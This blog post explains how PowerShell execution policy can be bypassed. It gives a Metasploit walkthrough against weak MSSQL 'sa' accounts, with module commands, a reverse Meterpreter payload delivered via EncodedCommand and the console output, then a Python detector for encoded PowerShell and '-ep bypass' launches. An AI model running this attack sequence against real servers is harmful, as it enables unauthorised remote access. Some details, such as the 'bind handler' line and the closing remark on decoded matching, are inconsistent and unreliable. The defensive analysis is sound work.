We already covered the PowerShell execution policies and protection measures provided by Microsoft; as a reminder, there are 4 execution-policy levels that govern which scripts are allowed to run.
That post focused mainly on what the system administrator gains. But what about attackers: does PowerShell give them an advantage when compromising remote systems, and can an attacker bypass the configured execution policy to run malicious scripts?
At DEF CON 18 there was an interesting presentation called "PowerShell …omfg" by David Kennedy (ReL1K) and Josh Kelley (Winfang). The demo showed how Windows PowerShell lets a user perform almost any task, and it introduced a new attack vector through PowerShell that delivers any payload, in both bind and reverse scenarios, and drops any executable.
On a penetration test, you start by running nmap to find the live Windows hosts on the network, specifically those with port 1433 (MSSQL) open. You then brute-force the "sa" account, which is the system administrator account for MSSQL. When the server uses "Mixed Mode" or "SQL Authentication", the "sa" account is created automatically; administrators have to set a password for it and often leave it weak.
Then open Metasploit with the latest update, which includes the Metasploit PowerShell payload support:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show payloads
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST [Your IP]
msf exploit(mssql_payload) > set RHOST [TARGET IP]
msf exploit(mssql_payload) > set UsePowershell true (this makes the module use PowerShell for the payload conversion on Server 2008 and Windows 7)
msf exploit(mssql_payload) > set UseCmdStager false
msf exploit(mssql_payload) > exploit
Metasploit will then display the following on the console:
[*] Started bind handler.
[*] Warning: This module will leave gjMKcfst.exe in the SQL Server %TEMP% directory
[*] Uploading the payload utilizing PowerShell EncodedCommand…
[*] Executing the payload…
[*] Sending stage (748032 bytes) to [TARGET IP]
[*] Be sure to cleanup gjMKcfst.exe…
[*] Meterpreter session 1 opened (10.X.X.X:4444 -> 10.X.X.X:1030)
The demonstrated attack works on Windows 2008 R2, Windows 7, or any Windows system that has PowerShell installed. The penetration tester bypasses the configured execution policy and runs the payload on the system to obtain a Meterpreter shell. Clearly, relying entirely on the execution policy is not a sound defence, since a malicious user can bypass it completely, as the EncodedCommand delivery above does.
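The payload above arrives through PowerShell's EncodedCommand switch, and nothing in the execution policy stops it. As an added example, not code from the original post or from Metasploit, here is a small Python detector a defender can run over process-creation command lines (for instance from Windows event 4688 or Sysmon event 1) to flag encoded PowerShell launches and command-line policy overrides and to decode the payload; the sample command lines, the regexes and the helper names are constructed for this example.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Added example, not from the post or Metasploit: flag PowerShell launches that carry an
# -EncodedCommand payload or a command-line execution-policy override, and decode the payload.
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...) and the
# argument is base64 over UTF-16LE text; -ExecutionPolicy / -ex / -ep override the set policy.
ENCODED_RE = re.compile(r'(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]{16,})')
POLICY_RE = re.compile(r'(?i)(?<!\S)-e(?:x[a-z]*|p)\s+"?(bypass|unrestricted)')
@dataclass
class Finding:
    cmdline: str
    encoded: bool = False                  # an -EncodedCommand argument was present
    decoded_command: Optional[str] = None  # its text, if it decoded cleanly
    policy_override: Optional[str] = None  # "bypass" / "unrestricted" if set

def encode_for_powershell(script: str) -> str:  # used here only to build test data
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(token: str) -> Optional[str]:
    """Reverse that encoding; None if the token is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are subclasses
        return None

def analyse_cmdline(cmdline: str) -> Optional[Finding]:
    """Return a Finding for a suspicious PowerShell launch, else None."""
    low = cmdline.lower()
    if "powershell" not in low and "pwsh" not in low:
        return None
    f = Finding(cmdline=cmdline)
    if m := ENCODED_RE.search(cmdline):
        f.encoded = True  # keep the hit even if decoding fails; a garbled token is odd too
        f.decoded_command = decode_encoded_command(m.group(1))
    if m := POLICY_RE.search(cmdline):
        f.policy_override = m.group(1).lower()
    return f if (f.encoded or f.policy_override) else None

def scan(cmdlines: List[str]) -> List[Finding]:
    return [f for f in map(analyse_cmdline, cmdlines) if f is not None]

# Constructed sample command lines, as they would appear in Windows event 4688 or Sysmon event 1.
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Get-Service"',  # plain admin use: not flagged
    'powershell.exe -nop -w hidden -ep bypass -enc RwBlAHQALQBEAGEAdABlAA==',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand RwBlAHQALQBEAGEAdABlAA==',
]
```

Because the match is on the decoded text rather than on the base64 blob, the same logic works whichever abbreviation of the switch the launcher used.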